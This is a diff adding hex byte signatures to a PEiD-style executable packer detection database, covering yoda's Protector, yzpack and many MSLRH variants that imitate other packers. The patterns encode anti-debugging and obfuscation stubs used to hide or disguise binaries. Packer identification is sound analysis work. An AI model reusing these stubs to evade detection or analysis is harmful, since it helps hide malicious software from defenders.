+ep_only = true
+
+[yoda's Protector V1.02 -> Ashkbiz Danehkar]
+signature = E8 03 00 00 00 EB 01 ?? BB 55 00 00 00 E8 03 00 00 00 EB 01 ?? E8 8F 00 00 00 E8 03 00 00 00 EB 01 ?? E8 82 00 00 00 E8 03 00 00 00 EB 01 ?? E8 B8 00 00 00 E8 03 00 00 00 EB 01 ?? E8 AB 00 00 00 E8 03 00 00 00 EB 01 ?? 83 FB 55 E8 03 00 00 00 EB 01 ?? 75 2E E8 03 00 00 00 EB 01 ?? C3 60 E8 00 00 00 00 5D 81 ED 23 3F 42 00 8B D5 81 C2 72 3F 42 00 52 E8 01 00 00 00 C3 C3 E8 03 00 00 00 EB 01 ?? E8 0E 00 00 00 E8 D1 FF FF FF C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 CC C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 4B CC C3 E8 03 00 00 00 EB 01 ?? 33 DB B9 3A 66 42 00 81 E9 1D 40 42 00 8B D5 81 C2 1D 40 42 00 8D 3A 8B F7 33 C0 E8 03 00 00 00 EB 01 ?? E8 17 00 00 00 90 90 90 E9 C3 1F 00 00 33 C0 64 FF 30 64 89 20 43 CC C3
+ep_only = true
+
+[yoda's Protector V1.03.1 -> Ashkbiz Danehkar]
+signature = E8 03 00 00 00 EB 01 ?? BB 55 00 00 00 E8 03 00 00 00 EB 01 ?? E8 8F 00 00 00 E8 03 00 00 00 EB 01 ?? E8 82 00 00 00 E8 03 00 00 00 EB 01 ?? E8 B8 00 00 00 E8 03 00 00 00 EB 01 ?? E8 AB 00 00 00 E8 03 00 00 00 EB 01 ?? 83 FB 55 E8 03 00 00 00 EB 01 ?? 75 2E E8 03 00 00 00 EB 01 ?? C3 60 E8 00 00 00 00 5D 81 ED 74 72 42 00 8B D5 81 C2 C3 72 42 00 52 E8 01 00 00 00 C3 C3 E8 03 00 00 00 EB 01 ?? E8 0E 00 00 00 E8 D1 FF FF FF C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 CC C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 4B CC C3 E8 03 00 00 00 EB 01 ?? 33 DB B9 3F A9 42 00 81 E9 6E 73 42 00 8B D5 81 C2 6E 73 42 00 8D 3A 8B F7 33 C0 E8 03 00 00 00 EB 01 ?? E8 17 00 00 00 90 90 90 E9 98 2E 00 00 33 C0 64 FF 30 64 89 20 43 CC C3
+ep_only = true
+
+[yoda's Protector V1.03.2 -> Ashkbiz Danehkar]
+signature = E8 03 00 00 00 EB 01 ?? BB 55 00 00 00 E8 03 00 00 00 EB 01 ?? E8 8F 00 00 00 E8 03 00 00 00 EB 01 ?? E8 82 00 00 00 E8 03 00 00 00 EB 01 ?? E8 B8 00 00 00 E8 03 00 00 00 EB 01 ?? E8 AB 00 00 00 E8 03 00 00 00 EB 01 ?? 83 FB 55 E8 03 00 00 00 EB 01 ?? 75 2E E8 03 00 00 00 EB 01 ?? C3 60 E8 00 00 00 00 5D 81 ED 94 73 42 00 8B D5 81 C2 E3 73 42 00 52 E8 01 00 00 00 C3 C3 E8 03 00 00 00 EB 01 ?? E8 0E 00 00 00 E8 D1 FF FF FF C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 CC C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 4B CC C3 E8 03 00 00 00 EB 01 ?? 33 DB B9 BF A4 42 00 81 E9 8E 74 42 00 8B D5 81 C2 8E 74 42 00 8D 3A 8B F7 33 C0 E8 03 00 00 00 EB 01 ?? E8 17 00 00 00 90 90 90 E9 63 29 00 00 33 C0 64 FF 30 64 89 20 43 CC C3
+ep_only = true
+
+[Yoda's Protector v1.03.2 Beta2 -> Ashkbiz Danehkar]
+signature = E8 03 00 00 00 EB 01 ?? BB 55 00 00 00 E8 03 00 00 00 EB 01 ?? E8 8F 00 00 00 E8 03 00 00 00 EB 01 ?? E8 82 00 00 00 E8 03 00 00 00 EB 01 ?? E8 B8 00 00 00
+ep_only = true
+
+[yoda's Protector v1.03.3 (.exe,.scr,.com) -> Ashkbiz Danehkar]
+signature = E8 03 00 00 00 EB 01 ?? BB 55 00 00 00 E8 03 00 00 00 EB 01 ?? E8 8E 00 00 00 E8 03 00 00 00 EB 01 ?? E8 81 00 00 00 E8 03 00 00 00 EB 01 ?? E8 B7 00 00 00 E8 03 00 00 00 EB 01 ?? E8 AA 00 00 00 E8 03 00 00 00 EB 01 ?? 83 FB 55 E8 03 00 00 00 EB 01 ?? 75
+ep_only = true
+
+[yoda's Protector V1.03.3 -> Ashkbiz Danehkar]
+signature = E8 03 00 00 00 EB 01 ?? BB 55 00 00 00 E8 03 00 00 00 EB 01 ?? E8 8E 00 00 00 E8 03 00 00 00 EB 01 ?? E8 81 00 00 00 E8 03 00 00 00 EB 01 ?? E8 B7 00 00 00 E8 03 00 00 00 EB 01 ?? E8 AA 00 00 00 E8 03 00 00 00 EB 01 ?? 83 FB 55 E8 03 00 00 00 EB 01 ?? 75 2D E8 03 00 00 00 EB 01 ?? 60 E8 00 00 00 00 5D 81 ED 07 E2 40 00 8B D5 81 C2 56 E2 40 00 52 E8 01 00 00 00 C3 C3 E8 03 00 00 00 EB 01 ?? E8 0E 00 00 00 E8 D1 FF FF FF C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 CC C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 4B CC C3
+ep_only = true
+
+[yoda's Protector v1.0b -> Ashkbiz Danehkar]
+signature = 55 8B EC 53 56 57 60 E8 00 00 00 00 5D 81 ED 4C 32 40 00 E8 03 00 00 00 EB 01 ?? B9 EA 47 40 00 81 E9 E9 32 40 00 8B D5 81 C2 E9 32 40 00 8D 3A 8B F7 33 C0 E8 04 00 00 00 90 EB 01 ?? E8 03 00 00 00 EB 01
+ep_only = true
+
+[yP v1.0b by Ashkbiz Danehkar]
+signature = 55 8B EC 53 56 57 60 E8 00 00 00 00 5D 81 ED 4C 32 40 00 E8 03 00 00 00 EB 01 ?? B9 EA 47 40 00 81 E9 E9 32 40 00 8B D5 81 C2 E9 32 40 00 8D 3A 8B F7 33 C0 E8 04 00 00 00 90 EB 01 C2 E8 03 00 00 00 EB 01 ?? AC ?? ?? ?? ?? ?? ?? ?? EB 01 E8
+ep_only = false
+
+[yzpack 1.12 -> UsAr]
+signature = 5A 52 45 60 83 EC 18 8B EC 8B FC 33 C0 64 8B 40 30 78 0C 8B 40 0C 8B 70 1C AD 8B 40 08 EB 09 8B 40 34 83 C0 7C 8B 40 3C AB E9 ?? ?? ?? ?? B4 09 BA 00 00 1F CD 21 B8 01 4C CD 21 40 00 00 00 50 45 00 00 4C 01 02 00 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 E0 00 ?? ?? 0B 01 ?? ?? ?? ?? 00 00
+ep_only = true
+
+[YZPack 1.2 --> UsAr]
+signature = 4D 5A 52 45 60 83 EC 18 8B EC 8B FC 33 C0 64 8B 40 30 78 0C 8B 40 0C 8B 70 1C AD 8B 40 08 EB 09 8B 40 34 83 C0 7C 8B 40 3C AB E9
+ep_only = true
+
+[yzpack 2.0 -> UsAr]
+signature = 25 ?? ?? ?? ?? 61 87 CC 55 45 45 55 81 ED CA 00 00 00 55 A4 B3 02 FF 14 24 73 F8 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 1F B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3C AA EB DC FF 54 24 04 2B CB 75 0F FF 54 24 08 EB 27 AC D1 E8 74 30 13 C9 EB 1B 91 48 C1 E0 08 AC FF 54 24 08 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 99 BD ?? ?? ?? ?? FF 65 28
+ep_only = true
+
+[yzpack V1.1 -> UsAr]
+signature = 60 33 C0 8D 48 07 50 E2 FD 8B EC 64 8B 40 30 78 0C 8B 40 0C 8B 70 1C AD 8B 40 08 EB 09 8B 40 34 8D 40 7C 8B 40 3C 89 45 04 E8 F3 07 00 00 60 8B 5D 04 8B 73 3C 8B 74 33 78 03 F3 56 8B 76 20 03 F3 33 C9 49 92 41 AD 03 C3 52 33 FF 0F B6 10 38 F2
+ep_only = true
+
+[ZCode Win32/PE Protector v1.01]
+signature = E9 12 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E9 FB FF FF FF C3 68 ?? ?? ?? ?? 64 FF 35
+ep_only = true
+
+[ZealPack 1.0 -> Zeal]
+signature = C7 45 F4 00 00 40 00 C7 45 F0 ?? ?? ?? ?? 8B 45 F4 05 ?? ?? ?? ?? 89 45 F4 C7 45 FC 00 00 00 00 EB 09 8B 4D FC 83 C1 01 89 4D FC 8B 55 FC 3B 55 F0 7D 22 8B 45 F4 03 45 FC 8A 08 88 4D F8 0F BE 55 F8 83 F2 0F 88 55 F8 8B 45 F4 03 45 FC 8A 4D F8 88 08 EB CD FF 65 F4
+ep_only = true
+
+[ZipWorxSecureEXE v2.5 -> ZipWORX Technologies LLC]
+signature = E9 B8 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 53 65 63 75 72 65 45 58 45 20 45 78 65 63 75 74 61 62 6C 65 20 46 69 6C 65 20 50 72 6F 74 65 63 74 6F 72 0D 0A 43 6F 70 79 72 69 67 68 74 28 63 29 20 32 30
+ep_only = true
+
+[[MSLRH]]
+signature = 60 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 81 83 C4 04 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 3D FF 0F 00 00 EB 01 68 EB 02 CD 20 EB 01 E8 76 1B EB 01 68 EB 02 CD 20 EB 01 E8 CC 66 B8 FE 00 74 04 75 02 EB 02 EB 01 81 66 E7 64 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 81
+ep_only = true
+
+[[MSLRH] v0.1 -> emadicius]
+signature = 60 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 81 83 C4 04 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 3D FF 0F 00 00 EB 01 68 EB 02 CD 20 EB 01 E8 76 1B EB 01 68 EB 02 CD 20 EB 01 E8 CC 66 B8 FE 00 74 04 75 02 EB 02 EB 01 81 66 E7 64 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08
+ep_only = true
+
+[[MSLRH] v0.31a]
+signature = 60 D1 CB 0F CA C1 CA E0 D1 CA 0F C8 EB 01 F1 0F C0 C9 D2 D1 0F C1 C0 D3 DA C0 D6 A8 EB 01 DE D0 EC 0F C1 CB D0 CF 0F C1 D1 D2 DB 0F C8 EB 01 BC C0 E9 C6 C1 D0 91 0F CB EB 01 73 0F CA 87 D9 87 D2 D0 CF 87 D9 0F C8 EB 01 C1 EB 01 A2 86 CA D0 E1 0F C0 CB 0F CA C0 C7 91 0F CB C1 D9 0C 86 F9 86 D7 D1 D9 EB 01 A5 EB 01 11 EB 01 1D 0F C1 C2 0F CB 0F C1 C2 EB 01 A1 C0 E9 FD 0F C1 D1 EB 01 E3 0F CA 87 D9 EB 01 F3 0F CB 87 C2 0F C0 F9 D0 F7 EB 01 2F 0F C9 C0 DC C4 EB 01 35 0F CA D3 D1 86 C8 EB 01 01 0F C0 F5 87 C8 D0 DE EB 01 95 EB 01 E1 EB 01 FD EB 01 EC 87 D3 0F CB C1 DB 35 D3 E2 0F C8 86 E2 86 EC C1 FB 12 D2 EE 0F C9 D2 F6 0F CA 87 C3 C1 D3 B3 EB 01 BF D1 CB 87 C9 0F CA 0F C1 DB EB 01 44 C0 CA F2 0F C1 D1 0F CB EB 01 D3 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00
+ep_only = true
+
+[[MSLRH] v0.32a (fake .BJFNT 1.3) -> emadicius]
+signature = EB 03 3A 4D 3A 1E EB 02 CD 20 9C EB 02 CD 20 EB 02 CD 20 60 EB 02 C7 05 EB 02 CD 20 E8 03 00 00 00 E9 EB 04 58 40 50 C3 61 9D 1F EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01
+ep_only = true
+
+[[MSLRH] v0.32a (fake ASPack 2.11d) -> emadicius]
+signature = 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF
+ep_only = true
+
+[[MSLRH] v0.32a (fake ASPack 2.12) -> emadicius]
+signature = 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 A0 02 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF
+ep_only = true
+
+[[MSLRH] v0.32a (fake EXE32Pack 1.3x) -> emadicius]
+signature = 3B C0 74 02 81 83 55 3B C0 74 02 81 83 53 3B C9 74 01 BC 56 3B D2 74 02 81 85 57 E8 00 00 00 00 3B DB 74 01 90 83 C4 14 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF
+ep_only = true
+
+[[MSLRH] v0.32a (fake Microsoft Visual C++) -> emadicius]
+signature = 55 8B EC 6A FF 68 CA 37 41 00 68 06 38 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 64 8F 05 00 00 00 00 83 C4 0C 5D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01
+ep_only = true
+
+[[MSLRH] v0.32a (fake MSVC++ 6.0 DLL) -> emadicius]
+signature = 55 8B EC 53 8B 5D 08 56 8B 75 0C 57 8B 7D 10 85 F6 5F 5E 5B 5D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF
+ep_only = true
+
+[[MSLRH] v0.32a (fake MSVC++ 7.0 DLL Method 3) -> emadicius]
+signature = 55 8B EC 53 8B 5D 08 56 8B 75 0C 5E 5B 5D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF
+ep_only = true
+
+[[MSLRH] v0.32a (fake MSVC++ DLL Method 4) -> emadicius]
+signature = 55 8B EC 56 57 BF 01 00 00 00 8B 75 0C 85 F6 5F 5E 5D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF
+ep_only = true
+
+[[MSLRH] v0.32a (fake Neolite 2.0) -> emadicius]
+signature = E9 A6 00 00 00 B0 7B 40 00 78 60 40 00 7C 60 40 00 00 00 00 00 B0 3F 00 00 12 62 40 00 4E 65 6F 4C 69 74 65 20 45 78 65 63 75 74 61 62 6C 65 20 46 69 6C 65 20 43 6F 6D 70 72 65 73 73 6F 72 0D 0A 43 6F 70 79 72 69 67 68 74 20 28 63 29 20 31 39 39 38 2C 31 39 39 39 20 4E 65 6F 57 6F 72 78 20 49 6E 63 0D 0A 50 6F 72 74 69 6F 6E 73 20 43 6F 70 79 72 69 67 68 74 20 28 63 29 20 31 39 39 37 2D 31 39 39 39 20 4C 65 65 20 48 61 73 69 75 6B 0D 0A 41 6C 6C 20 52 69 67 68 74 73 20 52 65 73 65 72 76 65 64 2E 00 00 00 00 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01
+ep_only = true
+
+[[MSLRH] v0.32a (fake nSPack 1.3) -> emadicius]
+signature = 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 D3 FE FF FF 8B 06 83 F8 00 74 11 8D B5 DF FE FF FF 8B 06 83 F8 01 0F 84 F1 01 00 00 61 9D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01
+ep_only = true
+
+[[MSLRH] v0.32a (fake PC-Guard 4.xx) -> emadicius]
+signature = FC 55 50 E8 00 00 00 00 5D EB 01 E3 60 E8 03 00 00 00 D2 EB 0B 58 EB 01 48 40 EB 01 35 FF E0 E7 61 58 5D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF
+ep_only = true
+
+[[MSLRH] v0.32a (fake PE Crypt 1.02) -> emadicius]
+signature = E8 00 00 00 00 5B 83 EB 05 EB 04 52 4E 44 21 85 C0 73 02 F7 05 50 E8 08 00 00 00 EA FF 58 EB 18 EB 01 0F EB 02 CD 20 EB 03 EA CD 20 58 58 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF
+ep_only = true
+
+[[MSLRH] v0.32a (fake PE Lock NT 2.04) -> emadicius]
+signature = EB 03 CD 20 C7 1E EB 03 CD 20 EA 9C EB 02 EB 01 EB 01 EB 60 EB 03 CD 20 EB EB 01 EB E8 03 00 00 00 E9 EB 04 58 40 50 C3 EB 03 CD 20 EB EB 03 CD 20 03 61 9D 83 C4 04 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF
+ep_only = true
+
+[[MSLRH] v0.32a (fake PEBundle 0.2 - 3.x) -> emadicius]
+signature = 9C 60 E8 02 00 00 00 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 07 30 40 00 87 DD 61 9D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF
+ep_only = true
+
+[[MSLRH] v0.32a (fake PEBundle 2.0x - 2.4x) -> emadicius]
+signature = 9C 60 E8 02 00 00 00 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 07 30 40 00 87 DD 83 BD 9C 38 40 00 01 61 9D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF
+ep_only = true
+
+[[MSLRH] v0.32a (fake PECompact 1.4x) -> emadicius]
+signature = EB 06 68 2E A8 00 00 C3 9C 60 E8 02 00 00 00 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 3F 90 40 00 61 9D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF
+ep_only = true
+
+[[MSLRH] v0.32a (fake PESHiELD 0.25) -> emadicius]
+signature = 60 E8 2B 00 00 00 0D 0A 0D 0A 0D 0A 52 65 67 69 73 74 41 72 65 64 20 74 6F 3A 20 4E 4F 4E 2D 43 4F 4D 4D 45 52 43 49 41 4C 21 21 0D 0A 0D 0A 0D 00 58 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF
+ep_only = true
+
+[[MSLRH] v0.32a (fake PEtite 2.1) -> emadicius]
+signature = B8 00 50 40 00 6A 00 68 BB 21 40 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 83 C4 04 61 66 9D 64 8F 05 00 00 00 00 83 C4 08 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF
+ep_only = true
+
+[[MSLRH] v0.32a (fake PEX 0.99) -> emadicius]
+signature = 60 E8 01 00 00 00 E8 83 C4 04 E8 01 00 00 00 E9 5D 81 ED FF 22 40 00 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01
+ep_only = true
+
+[[MSLRH] v0.32a (fake SVKP 1.11) -> emadicius]
+signature = 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 64 A0 23 00 00 00 83 C5 06 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01
+ep_only = true
+
+[[MSLRH] v0.32a (fake UPX 0.89.6 - 1.02 / 1.05 - 1.24) -> emadicius]
